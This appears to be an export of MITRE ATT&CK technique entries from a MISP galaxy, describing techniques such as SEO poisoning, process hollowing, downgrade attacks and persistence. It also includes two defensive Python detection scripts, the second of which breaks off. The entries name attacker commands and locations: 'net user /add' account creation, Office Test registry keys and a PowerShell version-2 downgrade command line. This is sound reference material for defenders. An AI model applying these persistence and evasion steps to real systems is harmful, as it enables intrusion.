Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)

To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as broader, seasonally popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)

Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)

SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)

The tag is: misp-galaxy:mitre-attack-pattern="SEO Poisoning - T1608.006"

Table 6051. Table References

Links

https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/

https://attack.mitre.org/techniques/T1608/006

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it

https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0

Standard Encoding - T1132.001

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001"

Table 6052. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1132/001

https://en.wikipedia.org/wiki/Binary-to-text_encoding

https://en.wikipedia.org/wiki/Character_encoding

Symmetric Cryptography - T1521.001

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.

The tag is: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1521.001"

Table 6053. Table References

Links

https://attack.mitre.org/techniques/T1521/001

Fileless Storage - T1027.011

Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)

Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.

Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.

Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., %SystemRoot%\System32\Wbem\Repository) or Registry (e.g., %SystemRoot%\System32\Config) physical files.(Citation: Microsoft Fileless)

The tag is: misp-galaxy:mitre-attack-pattern="Fileless Storage - T1027.011"

Table 6054. Table References

Links

https://attack.mitre.org/techniques/T1027/011

https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats

https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

Local Account - T1136.001

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, or to Kubernetes clusters using the kubectl utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001"

Table 6055. Table References

Links

https://attack.mitre.org/techniques/T1136/001

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

https://kubernetes.io/docs/concepts/security/service-accounts/

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630

Internal Defacement - T1491.001

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary’s presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001"

Table 6056. Table References

Links

https://attack.mitre.org/techniques/T1491/001

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

Asymmetric Cryptography - T1521.002

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1521/002).

The tag is: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1521.002"

Table 6057. Table References

Links

https://attack.mitre.org/techniques/T1521/002

Control Panel - T1218.002

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files; the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)

Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through their <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.(Citation: ESET InvisiMole June 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002"

Table 6058. Table References

Links

https://attack.mitre.org/techniques/T1218/002

https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/

https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Code Repositories - T1213.003

Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third-party sites such as GitHub, GitLab, SourceForge, and Bitbucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software’s source code. Having access to software’s source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)

Note: This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.

The tag is: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003"

Table 6059. Table References

Links

https://attack.mitre.org/techniques/T1213/003

https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/

https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/

Domain Account - T1136.002

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002"

Table 6060. Table References

Links

https://attack.mitre.org/techniques/T1136/002

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Unix Shell - T1623.001

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell - T1623.001"

Table 6061. Table References

Links

https://attack.mitre.org/techniques/T1623/001

https://partner.samsungknox.com/mtd

Office Test - T1137.002

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)

There exist user and global Registry keys for the Office Test feature:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

The tag is: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002"

Table 6062. Table References

Links

http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/

https://attack.mitre.org/techniques/T1137/002

https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

System Firmware - T1542.001

Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)

System firmware like BIOS and (U)EFI underlie the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001"

Table 6063. Table References

Links

http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

http://www.uefi.org/about

https://attack.mitre.org/techniques/T1542/001

https://en.wikipedia.org/wiki/BIOS

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface

https://github.com/chipsec/chipsec

https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/

Broadcast Receivers - T1624.001

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.

An intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.

In addition to Android system intents, malicious applications can register for intents broadcast by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting, of specific devices, users, or applications.

In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

The tag is: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1624.001"

Table 6064. Table References

Links

https://attack.mitre.org/techniques/T1624/001

https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts

Bidirectional Communication - T1481.002

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to a development project, updating a document hosted on a Web service, or sending a Tweet.

Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1481.002"

Table 6065. Table References

Links

https://attack.mitre.org/techniques/T1481/002

External Defacement - T1491.002

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)

The tag is: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002"

Table 6066. Table References

Links

https://attack.mitre.org/techniques/T1491/002

https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf

https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf

https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf

Process Hollowing - T1055.012

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.

Process hollowing is commonly performed by creating a process in a suspended state, then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the process's primary thread. At this point the process can be unmapped using API calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)

This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012"

Table 6067. Table References

Links

http://www.autosectools.com/process-hollowing.pdf

https://attack.mitre.org/techniques/T1055/012

https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode

Downgrade Attack - T1562.010

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.

Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ include Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may otherwise have been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)

Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)
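An added detection example (not code from MISP or MITRE) for the PowerShell engine downgrade described above: Windows PowerShell Event ID 400 ("Engine state is changed from None to Available") records both EngineVersion and HostVersion, so an engine older than 5.0 started by a 5.x host means a version without Script Block Logging was requested. The records are constructed samples, and the record shape is an assumption:

```python
"""Detect PowerShell engine downgrades in Windows PowerShell event log records."""
import re
from typing import Dict, List, Optional, Tuple

ENGINE_AVAILABLE_EVENT_ID = 400   # "Windows PowerShell" log, engine start-up
MIN_SBL_VERSION = (5, 0)          # Script Block Logging exists from 5.0 onwards

# Key=Value lines in the Details section of the Event ID 400 message body.
FIELD_RE = re.compile(r"^\s*(\w+)=(.*)$", re.MULTILINE)


def parse_fields(message: str) -> Dict[str, str]:
    """Extract the Key=Value details from an engine-state message."""
    return {k: v.strip() for k, v in FIELD_RE.findall(message)}


def version_tuple(text: str) -> Optional[Tuple[int, int]]:
    """Turn '5.1.19041.1' into (5, 1); None if the field is missing or odd."""
    m = re.match(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_engine_downgrade(record: dict) -> bool:
    """True when a 5.x-or-newer host started an engine older than 5.0."""
    if record.get("EventID") != ENGINE_AVAILABLE_EVENT_ID:
        return False
    fields = parse_fields(record.get("Message", ""))
    engine = version_tuple(fields.get("EngineVersion", ""))
    host = version_tuple(fields.get("HostVersion", ""))
    if engine is None or host is None:
        return False
    return engine < MIN_SBL_VERSION <= host


def find_downgrades(records: List[dict]) -> List[str]:
    """Return the HostApplication command line of every downgrade event."""
    return [
        parse_fields(rec["Message"]).get("HostApplication", "?")
        for rec in records
        if is_engine_downgrade(rec)
    ]


# Constructed sample records; the dict shape is assumed (EventID plus Message).
SAMPLE_RECORDS = [
    {"EventID": 400, "Message": (
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n"
        "\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1\n"
        "\tHostApplication=powershell.exe\n\tEngineVersion=5.1.19041.1\n")},
    {"EventID": 400, "Message": (
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n"
        "\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1\n"
        "\tHostApplication=powershell.exe -Version 2 -NoProfile\n"
        "\tEngineVersion=2.0\n")},
    {"EventID": 403, "Message": "Engine state is changed from Available to Stopped.\n"},
]

if __name__ == "__main__":
    for cmd in find_downgrades(SAMPLE_RECORDS):
        print("PowerShell engine downgrade:", cmd)
```

Removing the PowerShell 2.0 engine feature (or the .NET Framework 3.5 it depends on) closes the gap; the detection remains useful for hosts where that is not yet done.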

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade Attack - T1562.010"

Table 6068. Table References

Links

https://attack.mitre.org/techniques/T1562/010

https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/

https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/

https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/

https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

Business Relationships - T1591.002

Adversaries may gather information about the victim’s business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Business Relationships - T1591.002"

Table 6069. Table References

Links

https://attack.mitre.org/techniques/T1591/002

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Cloud Account - T1136.003

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003"

Table 6070. Table References

Links

https://attack.mitre.org/techniques/T1136/003

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory

https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide

https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554

https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d

System Checks - T1633.001

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapter addresses, CPU core count, and available memory/drive size.

Hardware checks, such as the presence of motion sensors, could also be used to gather evidence indicative of a virtual environment. Adversaries may also query for specific readings from these devices.

The tag is: misp-galaxy:mitre-attack-pattern="System Checks - T1633.001"

Table 6071. Table References

Links

https://attack.mitre.org/techniques/T1633/001

Outlook Forms - T1137.003

Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)

Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003"

Table 6072. Table References

Links

https://attack.mitre.org/techniques/T1137/003

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://sensepost.com/blog/2017/outlook-forms-and-shells/

Launch Agent - T1543.001

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware)(Citation: Antiquated Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments</code>, and <code>RunAtLoad</code> keys to identify the Launch Agent’s name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.

Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.

Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X)
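An added triage example (not code from MISP or MITRE) that parses LaunchAgent property lists with the standard-library plistlib and flags agents set to run at login (RunAtLoad or KeepAlive) whose program lives outside the usual locations; the "expected" path prefixes and the two sample plists are constructed assumptions:

```python
"""Triage macOS LaunchAgent .plist files for persistence indicators."""
import plistlib
from typing import Dict, List

# Program locations assumed normal for legitimate agents; tune per fleet.
EXPECTED_PROGRAM_PREFIXES = ("/System/", "/usr/", "/Library/", "/Applications/")


def agent_program(plist: dict) -> str:
    """Executable an agent runs: the Program key, else ProgramArguments[0]."""
    if "Program" in plist:
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def triage_launch_agent(plist_bytes: bytes) -> Dict[str, object]:
    """Parse one plist and return its label, program and a list of findings."""
    plist = plistlib.loads(plist_bytes)
    program = agent_program(plist)
    findings: List[str] = []
    if plist.get("RunAtLoad") is True:
        findings.append("RunAtLoad: executes at login")
    if plist.get("KeepAlive"):  # a bool, or a dict of relaunch conditions
        findings.append("KeepAlive: relaunched whenever it exits")
    if program and not program.startswith(EXPECTED_PROGRAM_PREFIXES):
        findings.append(f"program outside expected locations: {program}")
    if "Label" not in plist:
        findings.append("missing Label")
    return {"label": plist.get("Label", ""), "program": program, "findings": findings}


# Constructed samples (not real software or malware).
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

# Apple-looking label, hidden program path, started at login and kept alive.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array><string>/Users/alice/.hidden/helper</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
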